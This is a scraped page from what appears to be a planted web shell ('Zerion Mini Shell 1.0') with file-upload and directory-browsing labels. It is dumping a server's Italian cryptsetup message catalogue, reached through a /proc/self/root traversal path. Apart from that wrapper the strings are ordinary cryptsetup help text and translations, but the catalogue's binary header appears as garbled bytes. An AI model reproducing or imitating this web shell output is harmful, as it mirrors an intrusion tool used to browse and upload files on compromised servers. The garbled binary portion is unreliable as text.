ok

Mini Shell

Direktori : /proc/self/root/proc/thread-self/root/proc/self/root/usr/share/locale/it/LC_MESSAGES/
Upload File :
Current File : //proc/self/root/proc/thread-self/root/proc/self/root/usr/share/locale/it/LC_MESSAGES/cryptsetup.mo

������	������
�u�*<���;���'"JS!g��
��7�!4&9`~���2�,@\y,�� �#'>"X { ��0��-
�?�4*_"~%���(�+"%Ntx)|"�.�(�/!IQ6�<�;PK4�I�:GVA�`�NA6�:�6=9&w@��'�(6F1}��(�'�'/4H"_/�"���6`>�%�� &2 :Y M� f� +I!6u!�!B�!.�!."UB"k�"#&#?#T#Nk#�#�#�#/�#$O&$v$�$*�$
�$�$
%%%%:%1T%�%�%�%�%�%�%(�%&
5&1C&�u&5(�L(�')�*��*Sr+��+M~,�,�,%-1*-
\-j-&�-�-#�-�-.@.M.j..?�.-�.-�.5/U/"u/?�/�/�/0"0A0*a0)�0)�04�01411T1$�1%�1�15�1& 2G2�Y2=33O3A�3-�33�3;'4 c4$�44�4C�4="5`5d50h5,�5<�5,6606\g6<�6A7CC7`�74�7\8Rz8Z�8K(9ht9c�9<A:>~:6�:A�:.6;>e; �;-�;1�;R%<?x<�<�<0�<="=`=h=m=�=1�=M�=)(>�R><??D?"�?�?'�?,�?A@i\@��@7LA?�A�A_�A,8BeBd{B��BhC)~C�C&�Cd�CODmDuD>zD,�De�D7LE8�E>�E�EF1FEFJF,QF"~F?�F"�FG&G/GOGkG8sG#�G�GD�Gc*RH;-8uG$�65U��sfm�K^�y�
dwTj}k0i�+�.<x
n�CA&)l[ Qg@ore4/v?3J�B7��9"���	�OaD�(Y>#b:�h]_X�tZL�qN|p{S�WI�2=!V1�FM�z`P%~'\�E,
<action> is one of:

<name> is the device to create under %s
<data_device> is the data device
<hash_device> is the device containing verification data
<root_hash> hash of the root node on <hash_device>

<name> is the device to create under %s
<device> is the encrypted device
<key slot> is the LUKS key slot number to modify
<key file> optional key file for the new key for luksAddKey action

Default compiled-in device cipher parameters:
	loop-AES: %s, Key %d bits
	plain: %s, Key: %d bits, Password hashing: %s
	LUKS1: %s, Key: %d bits, LUKS header hashing: %s, RNG: %s

Default compiled-in dm-verity parameters:
	Hash: %s, Data block (bytes): %u, Hash block (bytes): %u, Salt size: %u, Hash format: %u

WARNING: real device header has different UUID than backup!
You can also use old <action> syntax aliases:
	open: create (plainOpen), luksOpen, loopaesOpen, tcryptOpen
	close: remove (plainClose), luksClose, loopaesClose, tcryptClose
# Tests are approximate using memory only (no storage IO).
%s: requires %s as arguments, set cipher to <data_device> <hash_device><data_device> <hash_device> <root_hash><device><device> <key slot><device> [--type <type>] [<name>]<device> [<key file>]<device> [<new key file>]<hash_device><name>Align payload at <n> sector boundaries - for luksFormatArgument <action> missing.Argument required.BITSBackup LUKS device header and keyslotsBlock size on the data deviceBlock size on the hash deviceCannot seek to device offset.
Command successful.
Create a readonly mappingDetected not yet supported GPG encrypted keyfile.
Device %s %s%sDisplay brief usageDo not ask for confirmationDo not use verity superblockDo not verify zeroed blocksDo you really want to change UUID of device?Enter any existing passphrase: Enter any remaining passphrase: Enter new passphrase for key slot: Enter new passphrase: Enter passphrase for %s: Enter passphrase for key slot %u: Enter passphrase to be changed: Enter passphrase to be deleted: Enter passphrase: Format type (1 - normal, 0 - original Chrome OS)Generating key (%d%% done).
Hash algorithmHeader dump with volume key is sensitive information
which allows access to encrypted partition without passphrase.
This dump should be always stored encrypted on safe place.Help options:How many sectors of the encrypted data to skip at the beginningHow often the input of the passphrase can be retriedIgnore corruption, log it onlyInvalid device size specification.Key size must be a multiple of 8 bitsKey slot is invalid.Limits the read from keyfileLimits the read from newly added keyfileLog file %s exists, resuming reencryption.
Maximum device reduce size is 64 MiB.MiBN/ANegative number for option not permitted.Number of bytes to skip in keyfileNumber of bytes to skip in newly added keyfileOnly one --key-file argument is allowed.Only one of --use-[u]random options is allowed.Only values between 1 MiB and 64 MiB allowed for reencryption block size.Option --align-payload is allowed only for luksFormat.Option --allow-discards is allowed only for open operation.
Option --decrypt is incompatible with specified parameters.Option --ignore-corruption and --restart-on-corruption cannot be used together.
Option --new cannot be used together with --decrypt.Option --offset is supported only for open of plain and loopaes devices.
Option --shared is allowed only for open of plain device.
Option --skip is supported only for open of plain and loopaes devices.
Option --tcrypt-hidden cannot be combined with --allow-discards.
Option --tcrypt-hidden, --tcrypt-system or --tcrypt-backup is supported only for TCRYPT device.
Option --test-passphrase is allowed only for open of LUKS and TCRYPT devices.
Option --use-[u]random is allowed only for luksFormat.Option --uuid is allowed only for luksFormat and luksUUID.Option --uuid is allowed only together with --decrypt.Option --veracrypt is supported only for TCRYPT device type.
PBKDF2 iteration time for LUKS (in ms)Please use gpg --decrypt <KEYFILE> | cryptsetup --keyfile=- ...
Print package versionRead the volume (master) key from file.Really try to repair LUKS device header?Reduce data device size (move data offset). DANGEROUS!Reduce size must be multiple of 512 bytes sector.Reencryption block sizeRepair failed.Restart kernel if corruption is detectedRestore LUKS device header and keyslotsSECTORSSaltShow debug messagesShow this help messageShows more detailed error messagesSlot number for new key (default is first free)Starting offset on the hash deviceSystem is out of entropy while generating volume key.
Please move mouse or type some text in another window to gather some random events.
The cipher used to encrypt the disk (see /proc/crypto)The hash used to create the encryption key from the passphraseThe number of blocks in the data fileThe size of the deviceThe size of the encryption keyThe start offset in the backend deviceThis function is not supported without TCRYPT header load.This is the last keyslot. Device will become unusable after purging this key.This operation will erase all keyslots on device %s.
Device will become unusable after this operation.This will overwrite data on %s irrevocably.Timeout for interactive passphrase prompt (in seconds)Unknown action.Use only specified device size (ignore rest of device). DANGEROUS!Verifies the passphrase by asking for it twiceVerify passphrase: WARNING: The --hash parameter is being ignored in plain mode with keyfile specified.
WARNING: The --keyfile-size option is being ignored, the read size is the same as the encryption key size.
[--cipher <cipher>][OPTION...] <action> <action-specific>[OPTION...] <device>add key to LUKS devicealready contains LUKS header. Replacing header will destroy existing keyslots.benchmark cipherblocksbyteschanges supplied key or key file of LUKS deviceclose device (remove mapping)does not contain LUKS header. Replacing header can destroy data on that device.dump LUKS partition informationdump TCRYPT device informationerase all keyslots (remove encryption key)format deviceformats a LUKS devicehex stringmsecsnumberopen device as mapping <name>print UUID of LUKS deviceremoves supplied key or key file from LUKS deviceresize active devicesecsshow active device statusshow device statusshow on-disk informationstringtests <device> for LUKS partition headertry to repair on-disk metadataverify devicewipes key with number <key slot> from LUKS deviceProject-Id-Version: cryptsetup-1.7.4
Report-Msgid-Bugs-To: dm-crypt@saout.de
PO-Revision-Date: 2017-03-09 23:36+0100
Last-Translator: Milo Casagrande <milo@milo.name>
Language-Team: Italian <tp@lists.linux.it>
Language: it
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Bugs: Report translation errors to the Language-Team address.
Plural-Forms: nplurals=2; plural=(n!=1);
X-Generator: Poedit 2.0beta3

<azione> è una tra:

<nome> è il dispositivo da creare in %s
<dispositivo_dati> è il dispositivo dei dati
<dispositivo_hash> è il dispositivo che contiene i dati di verifica
<hash_root> è l'hash del nodo radice nel <dispositivo_hash>

<nome> è il dispositivo da creare in %s
<dispositivo> è il dispositivo cifrato
<slot di chiave> è il numero dello slot di chiave LUKS da modificare
<file chiave> è il file chiave opzionale per la nuova chiave per l'azione luksAddKey

Parametri predefiniti del cifrario del dispositivo:
	loop-AES: %s, chiave: %d bit
	in chiaro: %s, chiave: %d bit, hash della password: %s
	LUKS1: %s, chiave: %d bit, hash dell'header LUKS: %s, RNG: %s

Parametri predefiniti compilati in dm-verity:
	Hash: %s, Blocco dati (byte): %u, Blocco hash (byte): %u, Dimensione salt: %u, Formato hash: %u

Attenzione: l'header reale del dispositivo ha un UUID diverso da quello di backup.
È possibile usare anche la vecchia sintassi <azione>:
	open: create (plainOpen), luksOpen, loopaesOpen, tcryptOpen
	close: remove (plainClose), luksClose, loopaesClose, tcryptClose
# I test sono approssimati usando solo la memoria (nessun IO dall'archivio).
%s: richiede %s come argomenti, imposta il cifrario a <dispositivo_dati> <dispositivo_hash><dispositivo_dati> <dispositivo_hash> <hash_root><dispositivo><dispositivo> <slot di chiave><dispositivo> [--type <tipo>] [<nome>]<dispositivo> [<file chiave>]<dispositivo> [<nuovo file chiave>]<dispositivo_hash><nome>Allinea il payload agli estremi del settore <n> - per luksFormatArgomento <azione> mancante.Argomento richiesto.BITFa il backup dell'header del dispositivo e degli slot di chiaveLa dimensione del blocco sul dispositivo datiLa dimensione del blocco sul dispositivo hashImpossibile posizionarsi all'offset del dispositivo.
Comando eseguito con successo.
Crea una mappatura in sola letturaRilevato un file chiave cifrato con GPG non ancora supportato.
Il dispositivo %s %s%sMostra il modo d'uso sinteticoNon chiede confermaNon usa il super-blocco verityNon verifica i blocchi azzeratiCambiare veramente l'UUID del dispositivo?Inserire una delle passphrase esistenti: Inserire una delle passphrase rimanenti: Inserire la nuova passphrase per lo slot di chiave: Inserire la nuova passphrase: Inserire la passphrase per %s: Inserire la passphrase per lo slot di chiave %u: Inserire la passphrase da cambiare: Inserire la passphrase da eliminare: Inserire la passphrase: Tipo di formato (1 - normale, 0 - ChromeOS originale)Generazione chiave (%d%% completato).
Algoritmo di hashIl dump dell'header con la chiave di volume contiene informazioni
confidenziali che permettono di accedere alla partizione cifrata senza passphrase.
Questo dump dovrebbe sempre essere salvato in modo cifrato in un luogo sicuro.Opzioni di aiuto:Quanti settori dei dati cifrati saltare dall'inizioQuante volte può essere ritentato l'inserimento della passphraseIgnora i dati rovinati, li registra solamenteSpecifica di dimensione del dispositivo non valida.La dimensione della chiave deve essere un multiplo di 8 bitLo slot di chiave non è valido.Limita la lettura dal file di chiaveLimita la lettura dal file di chiave appena aggiuntoIl file di registro %s esiste, viene ripristinata la re-cifratura.
La dimensione massima di riduzione del dispositivo è 64 MiB.MiBN/DNon è ammesso un numero negativo per l'opzione.Numero di byte da saltare nel file di chiaveNumero di byte da saltare nel file di chiave appena aggiuntoÈ consentito solo un argomento —key-file.È consentita solo una tra le opzioni --use-[u]random.Solo valori tra 1 MiB e 64 MiB sono consentiti per la dimensione del blocco di re-cifratura.L'opzione --align-payload è consentita solo per luksFormat.L'opzione --allow-discards è consentita solo per l'azione open.
L'opzione --decrypt non è compatibile con i parametri specificati.Le opzioni --ignore-corruption e --restart-on-corruption non possono essere utilizzate assieme.
L'opzione --new non può essere usata con --decrypt.L'opzione --offset è supportata solo per l'azione open di dispositivi in chiaro e loopaes.
L'opzione --shared è consentita solo per l'azione open di dispositivo in chiaro.
L'opzione --skip è supportata solo per l'azione open di dispositivi in chiaro e loopaes.
L'opzione --tcrypt-hidden non può essere utilizzata con --allow-discards.
L'opzione --tcrypt-hidden, --tcrypt-system o --tcrypt-backup è supportata solo per dispositivo TCRYPT.
L'opzione --test-passphrase è consentita solo per l'operazione open di dispositivo LUKS e TCRYPT.
L'opzione --use-[u]random è consentita solo per luksFormat.L'opzione --uuid è consentita solo per luksFormat e luksUUID.L'opzione --uuid può essere usata solo con --decrypt.L'opzione --veracrypt è supportata solo per dispositivo TCRYPT.
Tempo di iterazione di PBKDF2 per LUKS (in ms)Usare gpg --decrypt <FILECHIAVE> | cryptsetup --keyfile=- ...
Stampa la versione del pacchettoLegge la chiave (master) del volume dal file.Provare a riparare l'header del dispositivo LUKS?Riduce la dimensione dei dati del dispositivo (muove l'offset dei dati) PERICOLOSOLa dimensione di riduzione deve essere un multiplo di 512 byte.Dimensione blocco re-cifraturaRiparazione non riuscita.Riavvia il kernel se sono rilevati dati rovinatiRipristina l'header del dispositivo LUKS e gli slot di chiaveSETTORISaltMostra i messaggi di debugMostra questo messaggio d'aiutoMostra i messaggi di errore con maggior dettaglioNumero dello slot per la nuova chiave (il primo libero è quello predefinito)L'offset iniziale del dispositivo di hashIl sistema non ha un'entropia sufficiente mentre viene generata la chiave di volume.
Muovere il mouse o digitare del testo in un'altra finestra per accumulare più eventi casuali.
Il cifrario usato per cifrare il disco (vedere /proc/crypto)L'hash usato per creare la chiave di cifratura dalla passphraseIl numero di blocchi nel file datiLa dimensione del dispositivoLa dimensione della chiave di cifraturaL'offset iniziale del dispositivo di backendQuesta funzione non è supportata senza l'header TCRYPT caricato.Questo è l'ultimo slot di chiave. Il dispositivo sarà inutilizzabile dopo aver eliminato questa chiave.Questa operazione eliminerà tutti gli slot di chiave sul dispositivo %s.
Il dispositivo sarà inutilizzabile dopo questa operazione.Ciò sovrascriverà i dati in %s in modo irreversibile.Timeout per il prompt interattivo della passphrase (in secondi)Azione sconosciuta.Usa solo la dimensione specificata del dispositivo (ignora il resto del dispositivo) PERICOLOSOVerifica la passphrase chiedendola due volteVerifica passphrase: Attenzione: il parametro --hash viene ignorato in modalità normale con file di chiave specificato.
Attenzione: l'opzione --keyfile-size viene ignorata, la dimensione di lettura è la stessa della dimensione della chiave di cifratura.
[--cipher <cifrario>][OPZIONE...] <azione> <azione-specifica>][OPZIONI...] <dispositivo>Aggiunge la chiave al dispositivo LUKScontiene già un header LUKS. La sostituzione dell'header distruggerà gli slot di chiave esistenti.Esegue benchmark del cifrarioblocchibyteCambia la chiave fornita o il file chiave del dispositivo LUKSChiude il dispositivo (rimuove la mappatura)non contiene un header LUKS. La sostituzione dell'header può distruggere i dati in quel dispositivo.Esegue il dump delle informazioni sulla partizione LUKSEsegue il dump delle informazioni TCRYPT del dispositivoElimina tutti gli slot di chiavi (rimuove chiave di cifratura)Formatta il dispositivoFormatta un dispositivo LUKSstringa esadecimalemsecnumeroApre il dispositivo come mappatura in <nome>Stampa l'UUID del dispositivo LUKSRimuove la chiave fornita o il file chiave dal dispositivo LUKSRidimensiona il dispositivo attivosecMostra lo stato del dispositivo attivoMostra lo stato del dispositivoMostra informazioni on-diskstringaVerifica l'header della partizione LUKS di <dispositivo>Prova a riparare i metadati on-diskVerifica il dispositivoRipulisce la chiave con numero <slot di chiave> dal dispositivo LUKS

Zerion Mini Shell 1.0